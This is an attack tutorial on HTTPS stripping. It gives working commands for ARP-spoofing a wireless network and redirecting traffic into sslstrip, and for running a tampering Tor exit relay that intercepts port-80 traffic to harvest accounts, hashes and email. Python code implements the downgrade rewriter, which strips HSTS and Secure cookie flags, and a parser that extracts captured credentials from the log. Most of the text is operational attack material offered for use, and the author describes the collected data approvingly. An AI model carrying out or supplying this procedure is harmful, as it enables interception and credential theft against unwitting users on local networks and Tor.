
Juan J. Fernandez

SSL and HTTP Exposed


Secure Socket Layer is not as secure as we might think, at least not at the boundary between HTTP and HTTPS.

The weakness lies in the hand-off between HTTP and HTTPS: a user rarely types https:// and instead arrives at the secure site through an http:// link or an HTTP-to-HTTPS redirect. HTTPS stripping attacks exploit that hand-off by transparently hijacking the HTTP traffic on a network, watching the server's responses for HTTPS links and redirects, and rewriting them into look-alike HTTP links before they reach the client, while the attacker talks HTTPS to the real server.

The SSLSTRIP tool does exactly that. It can be deployed through a man-in-the-middle attack on a wireless network using iptables and arpspoof, and it can also be deployed on the Tor network if you configure your computer as an exit relay that allows port 80. Note that modern browsers defeat the downgrade for hosts they already know through HSTS or the HSTS preload list, so the attack works only against sites (and first visits) without such protection.
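The rewriting step described above, as an added illustration (this is example code written for this page, not sslstrip's own source): a response rewriter that downgrades https:// references to http://, remembers which URLs it stripped, and tells the proxy which of the victim's later plain-HTTP requests must be fetched upstream over HTTPS. The header handling (dropping HSTS, removing the Secure cookie flag) is what any stripping proxy needs to keep the downgrade alive; the sample response is constructed and the hostnames are placeholders.

```python
"""Added illustration of the stripping step (not sslstrip's own code):
a response rewriter that downgrades https:// references to http://,
remembers what it stripped, and tells the proxy which stripped requests
must be fetched upstream over HTTPS."""
import re

# Absolute https:// URL: host[:port] and an optional path.
HTTPS_URL = re.compile(r"https://([A-Za-z0-9.\-]+(?::\d+)?)(/[^\s\"'<>]*)?")


class Stripper:
    def __init__(self):
        # (host, path) pairs the victim has only ever seen as http://
        self.stripped = set()

    def _downgrade(self, m):
        host, path = m.group(1), m.group(2) or ""
        self.stripped.add((host, path or "/"))
        return "http://" + host + path

    def rewrite_response(self, headers, body):
        """Rewrite one server response on its way back to the victim.

        headers: dict of header name -> value (single-valued, for brevity)
        body:    response body as text
        Returns (new_headers, new_body).
        """
        out = {}
        for name, value in headers.items():
            lname = name.lower()
            if lname == "strict-transport-security":
                # Drop HSTS so a browser seeing this host for the first time
                # keeps accepting http://. A browser that already holds the
                # policy (or has it preloaded) refuses the downgrade anyway.
                continue
            if lname == "location":
                # A redirect to https:// is the classic entry point.
                value = HTTPS_URL.sub(self._downgrade, value)
            elif lname == "set-cookie":
                # Without the Secure flag the cookie is also sent over the
                # stripped http:// connection.
                value = re.sub(r";\s*secure\b", "", value, flags=re.IGNORECASE)
            out[name] = value
        return out, HTTPS_URL.sub(self._downgrade, body)

    def upstream_url(self, host, path):
        """Where to fetch a victim's plain-HTTP request from: stripped URLs
        go back to the real server over HTTPS, anything else over HTTP."""
        scheme = "https" if (host, path) in self.stripped else "http"
        return f"{scheme}://{host}{path}"


# Constructed sample response, as the real server would send it over HTTPS.
SAMPLE_HEADERS = {
    "Location": "https://login.example.com/",
    "Set-Cookie": "sid=abc123; Secure; HttpOnly",
    "Strict-Transport-Security": "max-age=31536000",
}
SAMPLE_BODY = ('<a href="https://login.example.com/account">Sign in</a> '
               '<img src="http://cdn.example.com/logo.png">')


def demo():
    """Strip the sample response and return the stripper plus the result."""
    s = Stripper()
    headers, body = s.rewrite_response(SAMPLE_HEADERS, SAMPLE_BODY)
    return s, headers, body


if __name__ == "__main__":
    s, headers, body = demo()
    print(headers)
    print(body)
    print(s.upstream_url("login.example.com", "/account"))
```

The victim's browser never sees a certificate warning because it never negotiates TLS: every request it makes is plain HTTP to the proxy, and only the proxy's side of the connection is HTTPS.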

REQUIREMENTS

I assume you are using a GNU/Linux OS (the iptables steps below are Linux-specific; Mac OS X uses ipfw/pf instead).

SSLSTRIP: the main tool for our stripping attack
IPTABLES: to match the target traffic and redirect it to sslstrip
ARPSPOOF: used on a wireless network to make our computer look like the router
Tor as a relay: to apply the same concept once we enter another network

Wireless HTTPS stripping attack


As root, enable packet forwarding and start the ARP spoofing:

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i <interface, e.g. wlan0> <LAN gateway IP, e.g. 192.168.1.1>

This lets your Linux box forward packets and injects ARP replies telling every host on the LAN that your MAC address is the router's, so they send all their traffic to you. (Without -t, arpspoof poisons every host on the segment; add -t <victim IP> to target a single machine.)

Open another terminal as root and add the NAT rule:

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

This firewall rule alters packets destined for port 80 as soon as they arrive, redirecting them to local port 8080, where sslstrip will listen.

In the same terminal, as root, start sslstrip, and in another terminal watch its log:

    sslstrip -l 8080 -w sslstrip.log
    tail -f sslstrip.log

At this point sslstrip does the job: neither the server nor the client knows you are hijacking the HTTP traffic, watching for HTTPS links and redirects, and mapping them to similar HTTP links or homograph-similar HTTPS links. The tail command lets you watch the log file as it grows.

Tor network HTTPS stripping attack


A wireless network is like any other network, so why not apply the same idea to another network, like the Tor network? It only requires a minor change to the iptables command, dropping arpspoof (the traffic comes to us by design), and of course setting up Tor as a relay.

Set up Tor relay


Tor is a network of relays: a user's traffic passes through about three computers (relays) before reaching its final destination. I will show you how to be the exit node (the last relay). We create a separate account so that the redirection rule can match that UID (the Tor process's, not ours); this is what keeps sslstrip's own upstream connections from being redirected back into itself and disconnecting. Open a terminal as root and type useradd toruser -u 111 -m, then passwd toruser (use any password you like); the UID 111 must match the --uid-owner in the iptables rule later. Log out of your account and log in as toruser. Install Tor (http://www.torproject.org/docs/tor-doc-unix.html.en). For the purpose of this presentation, download the Tor Browser Bundle for GNU/Linux from http://www.torproject.org/download/download.html.en, extract it with tar xvfz file.tar.gz, cd into the extracted directory and run vidalia from filedirectory/App. Once it is running, click "Setup Relaying" and configure an exit policy that allows port 80 only. If you are behind a router's firewall, forward the ports the relay listens on, the ORPort (9001) and DirPort (9030), to your local IP. Port 80 does not need forwarding for relaying, and 9051 is the local control port: it should stay local, since anyone who can reach it can control your Tor process. Once you have tested that the relay is reachable from the outside, log out of toruser and log back into your original account. Now the fun part starts...

Sniff out that Tor network!


Open a terminal, type su toruser and enter the assigned password. This is the important step for running the relay: cd into the tor-browser_en-US directory (in my case) inside the toruser account and run Tor:

    ./App/tor -f /home/toruser/tor-browser_en-US/Data/Tor/torrc

Now that everything is running and reachable from outside, open another terminal and, as root, type:

    iptables -t nat -I OUTPUT -p tcp -m owner --uid-owner 111 --dport 80 -j DNAT --to-destination 127.0.0.1:8080

Everything the toruser process sends to port 80 is now redirected to local port 8080. DNAT rewrites the destination address and port of matching packets; in the OUTPUT chain it applies to locally generated packets, which is exactly what the Tor process (UID 111) produces when it opens an exit connection, while sslstrip's own outbound connections, running as root, are left alone. (These iptables details are worth knowing to see what is really happening.) Now type sslstrip -l 8080 -w logfile, and in another terminal, to watch the file as it grows, tail -f logfile. Let it run for a couple of hours or days and you will see accounts, MD5 hashes, email messages, hosting accounts and more. Bear in mind that the directory authorities assign the BadExit flag to exits caught tampering with traffic, after which clients stop using them. The next page is just a small part of what I collected from the Tor network.
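Triaging what lands in the log, as an added example (written for this page, not part of sslstrip): a parser that pulls the captured POST bodies out of an sslstrip log and flags the ones that look like login forms. The line format is an assumption based on how sslstrip 0.9 logs POST data (a timestamp, the client IP, "SECURE POST Data (host):" or "POST Data (host):", and the body on the following line); adjust POST_LINE if your version writes something different. The sample log is constructed.

```python
"""Added example (not sslstrip's code): triage an sslstrip log for the
POST bodies it captured. The line format is an assumption based on how
sslstrip 0.9 logs POST data; adjust POST_LINE if yours differs."""
import re
from urllib.parse import parse_qsl

# "<time> <client> SECURE POST Data (<host>):" with the body on the next
# line. SECURE POST marks a form the victim would have sent over HTTPS.
POST_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d,\d+) (?P<client>\S+) "
    r"(?P<kind>SECURE POST|POST) Data \((?P<host>[^)]+)\):$"
)

# Form field names that usually carry credentials (substring match).
CRED_KEYS = ("user", "login", "email", "pass", "pwd")


def parse_log(text):
    """Return one record per logged POST: who sent it, to which host,
    whether it was a stripped HTTPS form, and the decoded form fields."""
    records = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = POST_LINE.match(lines[i])
        if not m:
            i += 1          # other log chatter: skip
            continue
        body = lines[i + 1] if i + 1 < len(lines) else ""
        records.append({
            "time": m["ts"],
            "client": m["client"],
            "host": m["host"],
            "stripped": m["kind"] == "SECURE POST",
            "fields": dict(parse_qsl(body, keep_blank_values=True)),
        })
        i += 2
    return records


def likely_credentials(records):
    """Pick out the records whose fields look like login forms."""
    hits = []
    for r in records:
        creds = {k: v for k, v in r["fields"].items()
                 if any(key in k.lower() for key in CRED_KEYS)}
        if creds:
            hits.append((r["host"], r["client"], creds))
    return hits


# Constructed sample log in the assumed format; no real traffic.
SAMPLE_LOG = """\
2011-03-14 21:05:17,482 10.0.0.7 SECURE POST Data (login.example.com):
username=alice&password=hunter2&remember=1
2011-03-14 21:06:02,119 10.0.0.7 POST Data (forum.example.net):
q=search+terms
2011-03-14 21:07:44,900 10.0.0.12 SECURE POST Data (webmail.example.org):
email=bob%40example.org&pwd=Tr0ub4dor%263
"""

if __name__ == "__main__":
    for host, client, creds in likely_credentials(parse_log(SAMPLE_LOG)):
        print(f"{client} -> {host}: {creds}")
```

On a Tor exit the client column is always 127.0.0.1, since the redirected connections come from the local Tor process; the host and form fields are what carry the information.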

References

DEFCON 17: http://www.youtube.com/watch?v=ibF36Yyeehw
SSLSTRIP: http://www.thoughtcrime.org/software/sslstrip/
Tor: http://www.torproject.org/docs/documentation.html.en
IPTABLES: http://linux.die.net/man/8/iptables
